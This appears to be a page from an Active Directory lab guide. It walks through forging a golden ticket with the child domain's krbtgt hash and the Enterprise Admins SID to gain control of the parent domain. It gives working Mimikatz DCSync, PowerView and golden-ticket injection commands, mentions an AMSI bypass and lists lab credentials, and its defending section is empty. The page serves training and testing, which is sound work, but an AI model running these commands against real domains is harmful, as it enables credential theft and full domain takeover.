# Krbtgt hash

## Attacking

### How it works

Once you gain Domain Admin privileges within the child domain its possible to get Enterprise Admin in the parent domain by generating a golden ticket in the child domain with the SID of the Enterprise Admin group.

### Tools

* [MimiKatz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1)
* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)

### Executing the attack

The attack is executed from the perspective of already gaining domain admin privileges. This is done in the unconstrained delegation section:

{% content-ref url="../../delegation-attacks/unconstrained-delegation" %}
[unconstrained-delegation](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/delegation-attacks/unconstrained-delegation)
{% endcontent-ref %}

1. For easy execution, login on `WS01` as the `Administrator` user with the password `Welcome01!`.
2. Start PowerShell as Administrator and load a amsi bypass and MimiKatz into memory.

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FeuHHlLcVqWNRDOyTIJPp%2Fimage.png?alt=media&#x26;token=73e559e5-6ea5-4250-8017-a84dec8632d9" alt=""></div>

To execute the attack we need a couple bits of information:

* The hash of the krbtgt user.
* The SID of the Enterprise Admins group.
* The SID of the child domain.

3\. Execute a DCsync with MimiKatz and only retrieve the krbtgt hash:

```
Invoke-MimiKatz -Command '"lsadump::dcsync /user:amsterdam\krbtgt /domain:amsterdam.bank.local"'
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2Fa5gv2uCf5QDd7d5Ihu47%2Fimage.png?alt=media&#x26;token=0e68a50e-fb94-44e1-be75-91d6c1e32c11" alt=""></div>

4\. Retrieve the SID of the enterprise Admins group, using PowerView:

```
Get-DomainGroup "Enterprise Admins" -Domain bank.local | Select-Object samaccountname, objectsid
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2F6GXd3KjuAEjMJOVOjgJ4%2Fimage.png?alt=media&#x26;token=e3a998a4-54fc-4f19-9f4d-0fb460ffbe56" alt=""></div>

5\. Retrieve the domain SID from the child domain, using PowerView:

```
Get-DomainSID
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FOrjfY6XkLxLSBApum12n%2Fimage.png?alt=media&#x26;token=efdb3b8e-a18a-43ca-b3ae-d229464dd4d6" alt=""></div>

6\. Create a golden ticket with MimiKatz and inject it into the current session:

```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<FQDN CHILD DOMAIN> /sid:<CHILD DOMAIN SID> /krbtgt:<HASH> /sids:<SIDS OF ENTERPRISE ADMIN GROUP OF TARGET> /ptt"'
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FW9mMXZCyjkE2Dh5UOf7Z%2Fimage.png?alt=media&#x26;token=5b57cabc-d5b8-424f-8fc9-aa74df1d92f3" alt=""></div>

7\. The ticket injected successfully, now we can dir the c$ directory to check if our user has read/write access to the C disk:

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FpCWXjKXjdRkvCrFBGYFV%2Fimage.png?alt=media&#x26;token=186ccc49-6391-4508-8bba-2f51d9e18f8c" alt=""></div>

## Defending

### Detection

## References

{% embed url="<https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1>" %}